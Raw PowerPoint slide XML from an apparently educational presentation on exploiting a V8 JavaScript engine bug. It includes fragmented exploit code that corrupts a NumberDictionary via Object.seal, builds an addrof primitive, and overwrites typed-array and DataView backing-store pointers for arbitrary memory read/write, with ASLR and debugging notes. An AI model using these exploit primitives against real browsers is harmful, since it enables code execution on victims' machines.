              <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        // float_array[31] = float_array[31].setHighUint32((float_array[45].float_to_high_32bit() - 1n + 12n + 28n));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        float_array[26] = float_array[26].setHighUint32(0x04040404n);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="700">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        console.log('[+][EXPLOIT_MEMDUMP] ============================================================');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        console.log('[+][AFTER] float_array[4]: ' + float_array[4].float_to_low_32bit().toString(16));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        console.log('[+][AFTER] float_array[4]: ' + float_array[4].float_to_high_32bit().toString(16));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="700">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        console.log('[+][VERIFY_RESULT_LENGTH] =======================================================');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        console.log('[+][RESULT] tarr.length: ' + tarr.length);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="700">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        console.log('[+][RESULT] tarr.byteLength: ' + tarr.byteLength);</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="700">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="그림 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC88B77D-5EBA-4FB6-91AA-DAD3A308BA45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5747028" y="1389401"/>
            <a:ext cx="6176171" cy="5086258"/>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9" name="직사각형 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5ABA2830-EC60-40F2-8484-2E555C1B78C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="799344" y="3881658"/>
            <a:ext cx="2755311" cy="1211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62D3869B-5F55-4A4F-99FF-70121F23F691}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="8" idx="1"/>
            <a:endCxn id="9" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="799344" y="3942215"/>
            <a:ext cx="2" cy="1279004"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 11430100000"/>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8E1A115A-EF6A-4F91-831B-FA7635AE36DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="799344" y="5036553"/>
            <a:ext cx="4839518" cy="1439106"/>
            <a:chOff x="708507" y="5036553"/>
            <a:chExt cx="4839518" cy="1439106"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="TextBox 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C55F330-349E-422E-97B5-D6554802EDF8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="708509" y="5036553"/>
              <a:ext cx="4839508"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defRPr sz="900">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Clear Sans Medium" panose="020B06030302020203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What you see on the right is a problem due to an error in the DataView when the poc is run in the browser. (There is no 0x04040404 address in the browser. Because of ASLR.)</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="16" name="그림 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6DAEB19-1FA6-4F2B-B7FF-DAA77CDC7EFF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="708507" y="5405885"/>
              <a:ext cx="4839516" cy="423443"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="직사각형 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE2D819A-8043-437D-A29B-93C4C1C9E6F2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="708507" y="5829328"/>
              <a:ext cx="4839518"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ko-KR" altLang="en-US" sz="900">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>I used this command to work with the ASLR off when debugging with d8.exe. Because if I change the backing store pointer to 0x00400000 fixed address correctly, I can always see the 'MZ'(0x00785A4D) string value. However, because the browser is in ASLR state, you can't read arbitrary memory as a test, so you need to work on it in d8.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="슬라이드 번호 개체 틀 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD0C2C4B-B523-4123-B5DD-CA72F27D33CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F3ECD9F8-CFA2-4FC9-86A0-B66D202A3856}" type="slidenum">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>/23</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="날짜 개체 틀 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{966E6C12-8BBE-4E0B-9532-71E093E1D60F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7947721C-5EE9-4219-B61E-EB84EC1A126E}" type="datetime1">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2019-11-28</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1958148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0D261878-EBD3-4BA7-A22C-C8E790D85BD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2797300" y="1470918"/>
            <a:ext cx="2697042" cy="4799460"/>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16" name="직사각형 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD74E0CF-0294-4D98-A4FF-B39F07F43BEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5494342" y="1466610"/>
            <a:ext cx="6039875" cy="4570852"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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if (float_array[2] !== undefined) {</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 PADDING');</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 PADDING');</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this.exploited = true;</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console.log('[+][addrof] float_array[18]: ' + float_array[obj_prop_b_offset].float_to_low_32bit().toString(16));</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console.log('[+][addrof] addrof(view): ' + addrof(view).toString(16));</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console.log('[+][BEFORE] float_array[4]: ' + float_array[4].float_to_low_32bit().toString(16));</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console.log('[+][BEFORE] float_array[4]: ' + float_array[4].float_to_high_32bit().toString(16));</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tarr.byteLength</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float_array[3] = float_array[3].setHighUint32(0xC8C8);</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tarr.length</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float_array[4] = float_array[4].setLowUint32(0xC8C8);</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tarr.buffer</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float_array[8] = float_array[8].setHighUint32(0x00400000n);</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view.byteLength</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float_array[15] = float_array[15].setLowUint32(0xC8C8);</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console.log('[+][AFTER] float_array[4]: ' + float_array[4].float_to_low_32bit().toString(16));</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console.log('[+][AFTER] float_array[4]: ' + float_array[4].float_to_high_32bit().toString(16));</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console.log('[+][OOB] tarr.length: ' + tarr.length);</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console.log('[+][OOB] tarr.byteLength: ' + tarr.byteLength);</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console.log('[+][OOB] view.byteLength: ' + view.byteLength);</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for (i = 0; i &lt; 20; i++) {</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if (i == 0) {</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console.log('[+][64bit][32bit_high_byte] float_array[' + (i*2).toString() + ']: ' + float_array[i].float_to_low_32bit().toString(16));</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console.log('[+][64bit][32bit_low__byte] float_array[' + (i*2+1).toString() + ']: ' + float_array[i].float_to_high_32bit().toString(16));</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else {</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console.log('[+][64bit][32bit_high_byte] float_array[' + (i*2).toString() + ']: ' + float_array[i].float_to_low_32bit().toString(16));</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console.log('[+][64bit][32bit_low__byte] float_array[' + (i*2+1).toString() + ']: ' + float_array[i].float_to_high_32bit().toString(16));</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return true;</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return false;</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a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400"/>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8" y="866181"/>
            <a:ext cx="11864090" cy="461665"/>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sz="1200"/>
              <a:t>I will now explain the code to run the calculator by optimizing the PoC code described in the previous chapter.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200"/>
              <a:t>The code from the previous chapter is simplified as follows:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADA497E1-B000-4529-A911-08A8FFDC8F2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611942" y="129722"/>
            <a:ext cx="6890983"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Read and Write arbitrary memory with DataView</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400">
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="직사각형 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5E95CEF-8CEC-4CA7-87C2-501C95BD3C9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="150278" y="1469064"/>
            <a:ext cx="2648991" cy="4801314"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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function exploit() {</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let xxx = [];</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const o = {foo: 0x41414141};</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for (let i = 0; i &lt; 15; i++) {</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o[i] = i+16;</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the first corruption target</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float_array = [0x41414141];</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second corruption target</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tarr = new Uint32Array(2);</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tarr[0] = 0x31313131;</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tarr[1] = 0x32323232;</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view = new DataView(tarr.buffer);</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object used to imlpement the addrof primitive</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obj_addrof = {'a': 0x31323334/2, 'b': 1};</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obj_addrof['b'] = obj_addrof;</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build a NumberDictionary inside the FixedArray</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o[0] = 0x08;    // number of elements</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o[1] = 0;       // number of deleted elements</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o[2] = 0x08;    // capacity;</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o[3] = 0x32;    // max key/requires slow elements</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first element of the NumberDictionary</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o[4] = 0;       // key</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o[5] = 0x4141;  // value</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o[6] = 0xc0;    // PropertyDesc</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Object.seal(o);</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const v12 = {foo: 0x42424242};</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Object.preventExtensions(v12);</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Object.seal(v12);</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const v18 = {foo: Object};</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v12.__proto__ = 0;</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o[0] = 0x4242;</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for (i = 0; i &lt; o.length; i++) {</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 PADDING');</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delete o[1];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endPar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for (i = 0; i &lt; o.length; i++) {</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console.log('[+] PADDING');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="6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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="사각형: 둥근 모서리 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{158B89C1-92CD-4F92-B337-DCF6172C6208}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="335130" y="5325566"/>
            <a:ext cx="1308016" cy="3396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2EFCEA98-62AA-41B0-807D-38BCE6D95F8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="338719" y="5876126"/>
            <a:ext cx="1308016" cy="3396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002BA7E3-CC6D-4B88-B2FC-91612356C956}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5876475" y="1590528"/>
            <a:ext cx="1039118" cy="2087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FA463DFF-30BB-4FE8-9822-B4BC36F1E538}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8348957" y="1466610"/>
            <a:ext cx="3185260" cy="5078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ko-KR" altLang="en-US" sz="900">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>If you want to modify this code, the padding will change after you complete the modification, so adjust it by adding or subtracting the padding.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="연결선: 꺾임 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D437A34-2B53-4B4D-ABE1-14B49C64C868}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="21" idx="3"/>
            <a:endCxn id="22" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6915593" y="1694914"/>
            <a:ext cx="1433364" cy="25612"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>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D43F96A8-95F8-4F57-83A4-04E56C2EDE8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="20" idx="2"/>
            <a:endCxn id="22" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4015826" y="-1302573"/>
            <a:ext cx="4495292" cy="10541490"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -5085"/>
              <a:gd name="adj2" fmla="val 102169"/>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7E70913-0333-4950-A41A-27321C8203B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="19" idx="2"/>
            <a:endCxn id="20" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="989138" y="5665258"/>
            <a:ext cx="3589" cy="210868"/>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2EFFC303-EEF0-4134-954B-454A62BA4D7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2797300" y="3945775"/>
            <a:ext cx="2040707" cy="1019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6D2A000F-5204-4FCA-A7A8-6F617FAC09BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2800889" y="4965469"/>
            <a:ext cx="2040707" cy="764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D6E3615B-C2FA-4CFC-9EA9-060DFBC97694}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2797300" y="5730240"/>
            <a:ext cx="2047885" cy="54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5BF76260-2578-46D0-91EA-E88B070AD41C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2800889" y="2842953"/>
            <a:ext cx="2037118" cy="1102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CE833184-74F7-4F7F-A753-F5A33BD1A6AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="368382" y="2238893"/>
            <a:ext cx="1078033" cy="1163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3EF48F24-47B4-413E-9FD3-3C96B9CCEC0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="368382" y="2510441"/>
            <a:ext cx="1078033" cy="293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95AD03D4-2D3D-40ED-AB2C-F534BDBD58DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="368382" y="2870939"/>
            <a:ext cx="1308016" cy="1163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1" name="연결선: 꺾임 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FAE47DB-CFD2-4A3B-8FCD-318AB1BC3D6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="57" idx="3"/>
            <a:endCxn id="56" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1446415" y="2297083"/>
            <a:ext cx="1354474" cy="1097281"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 89278"/>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F1AD3260-F963-4D07-91C8-41EFBF0C6A93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="58" idx="3"/>
            <a:endCxn id="53" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1446415" y="2657301"/>
            <a:ext cx="1350885" cy="1798321"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 81588"/>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5AD0AC8-B620-4548-9521-6E2072F4D1DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="59" idx="3"/>
            <a:endCxn id="54" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676398" y="2929129"/>
            <a:ext cx="1124491" cy="2418726"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 68727"/>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5FBA9A54-69D5-4FB3-AA6D-30C58AA15997}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="373915" y="3153718"/>
            <a:ext cx="1604506" cy="19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0" name="연결선: 꺾임 79">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A17189D4-06A9-46CF-AEFB-8C7F35E89699}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="78" idx="3"/>
            <a:endCxn id="55" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1978421" y="3253580"/>
            <a:ext cx="818879" cy="2746729"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 44586"/>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03EF8D8A-8E48-4D0E-9A25-1B1203DD13BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3250988" y="3271254"/>
            <a:ext cx="825318" cy="246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float_array</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92" name="직사각형 91">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2274931E-C47B-4E2A-9C9C-8465AF9AC092}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
